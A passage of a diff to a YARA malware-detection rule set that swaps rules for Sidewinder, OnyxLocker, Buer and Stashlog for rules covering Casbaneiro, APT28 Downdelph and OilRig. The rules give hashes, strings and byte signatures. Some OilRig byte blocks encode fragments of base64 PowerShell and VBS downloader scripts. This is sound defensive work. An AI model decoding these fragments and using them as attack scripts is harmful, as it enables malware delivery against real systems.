8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 }
-		$seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 }
+		$com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide
+		$com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide
+		$com3 = "has_matching_a == 1" fullword wide
+		$com4 = "ODFA: %u %d %u" fullword ascii
+		$com5 = "Custom browser path is empty." fullword ascii
+		$com6 = "Default browser path is:" fullword ascii
+		$com7 = "Search for browser path." fullword ascii
+		$com8 = "Cant retrieve any path." fullword ascii
+		$com9 = "Custom browser path is:" fullword ascii
+		$jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 }
+		$jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc }
+		$seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 }
+		$seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 }
+		$seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 }
+		$seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 2 of ( $seq* ) and 7 of ( $str* )
+		uint16( 0 ) == 0x5a4d and filesize > 1000KB and 6 of ( $com* ) and all of ( $jmp* ) and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE
 {
 	meta:
-		description = "Detect Sidewinder DLL decoder algorithm"
+		description = "Detect MSIPackage used by Casbaneiro"
 		author = "Arkbird_SOLG"
-		id = "9e948949-f38d-5a76-a34c-965ec9be070d"
-		date = "2020-11-14"
-		modified = "2020-11-15"
-		reference = "https://twitter.com/hexfati/status/1325397305051148292"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12"
+		id = "47a5ea47-f799-5467-a482-9816c0de3ecf"
+		date = "2020-06-05"
+		modified = "2020-06-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22"
 		license_url = "N/A"
-		logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671"
+		logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa"
+		hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d"
 
 	strings:
-		$s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? }
+		$x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii
+		$s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii
+		$s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii
+		$s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii
+		$s5 = "https://www.mozilla.com0\\r" fullword wide
+		$s6 = "__CxxFrameHandler" fullword ascii
+		$s7 = "release+certificates@mozilla.com" fullword ascii
+		$s8 = "setup-stub.exe" fullword ascii
+		$s9 = "7zS.sfx.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 3KB and $s
+		uint16( 0 ) == 0xd0cf and filesize > 100KB and 7 of them
 }
-rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect OnyxLocker ransomware"
+		description = "Detect Downdelph used by APT28 group"
 		author = "Arkbird_SOLG"
-		id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e"
-		date = "2020-11-18"
-		modified = "2020-11-18"
-		reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27"
+		id = "0376c026-93eb-526a-8ab3-26bdd365e608"
+		date = "2021-02-18"
+		modified = "2021-02-19"
+		reference = "https://twitter.com/RedDrip7/status/1362343352759250946"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1"
+		logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7"
+		hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b"
 
 	strings:
-		$s1 = "IEncryptionProvider" fullword ascii
-		$s2 = "OnyxLocker.exe" fullword wide
-		$s3 = "GetEncryptionThreads" fullword ascii
-		$s4 = "CreateEncryptionKey" fullword ascii
-		$s5 = ".NETFramework,Version=v4.5.2" fullword ascii
-		$s6 = "get_TargetFiles" fullword ascii
-		$s7 = "IsTargetFile" fullword ascii
-		$s8 = "<TargetFiles>k__BackingField" fullword ascii
-		$s9 = "XxteaEncryptionProvider" fullword ascii
-		$s10 = "GetStartingFolders" fullword ascii
-		$s11 = "<EncryptionKey>k__BackingField" fullword ascii
-		$s12 = "RECOVERY INSTRUCTIONS" fullword wide
-		$s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii
-		$s14 = ".NET Framework 4.5.2" fullword ascii
-		$s15 = "TraverseDirectories" fullword ascii
-		$s16 = "{0} {1}" fullword wide
+		$s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d }
+		$s2 = "cmd.exe /c " fullword ascii
+		$s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
+		$s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 }
+		$s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 }
+		$s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 8KB and 8 of them
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of them
 }
-rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE
 {
 	meta:
-		description = "Detect Buer loader"
+		description = "Detect VBS script in base 64 used by OilRig (2016)"
 		author = "Arkbird_SOLG"
-		id = "a2883eca-d576-53ba-aa97-5e3c94f501a5"
-		date = "2020-12-01"
-		modified = "2020-12-01"
-		reference = "https://twitter.com/James_inthe_box/status/1333551419735953409"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64"
+		id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730"
+		date = "2020-08-26"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23"
 		license_url = "N/A"
-		logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59"
+		logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad"
 		score = 75
-		quality = 55
+		quality = 63
 		tags = "FILE"
-		hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232"
-		hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005"
-		hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f"
+		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
+		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
 
 	strings:
-		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
-		$s2 = "%02x" fullword wide
-		$s3 = "{%s-%d-%d}" fullword wide
-		$s4 = "update" fullword wide
-		$s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii
-		$s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii
-		$s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii
-		$s8 = "]otju}y&>47" fullword ascii
-		$s9 = "]otju}y&Ykx|kx&8678" fullword ascii
-		$s10 = "]otju}y&=" fullword ascii
-		$s11 = "Iutzktz3Z" fullword ascii
-		$s12 = "g|mnuuq~4jrr" fullword ascii
-		$s13 = "RegularModules" fullword ascii
-		$s14 = "]otju}y&>" fullword ascii
+		$block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 }
+		$block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 }
+		$block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 }
+		$block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 }
+		$block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53}
+		$block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 }
+		$block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b }
+		$block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 8 of them
+		filesize < 2KB and 6 of them
 }
-rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE
 {
 	meta:
-		description = "Detect Stashlog malware"
+		description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)"
 		author = "Arkbird_SOLG"
-		id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93"
-		date = "2021-09-01"
-		modified = "2021-09-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21"
+		id = "782503c2-a292-505c-b513-79cbbd381124"
+		date = "2020-08-26"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45"
 		license_url = "N/A"
-		logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b"
-		score = 50
-		quality = 75
+		logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5"
+		score = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397"
-		hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c"
-		level = "experimental"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
+		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
 
 	strings:
-		$s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii
-		$s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 }
-		$s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f }
-		$s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f }
-		$s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 }
+		$block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 }
+		$block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f }
+		$block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 }
+		$block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 }
+		$block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 }
+		$block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 }
+		$block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 }
+		$block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47}
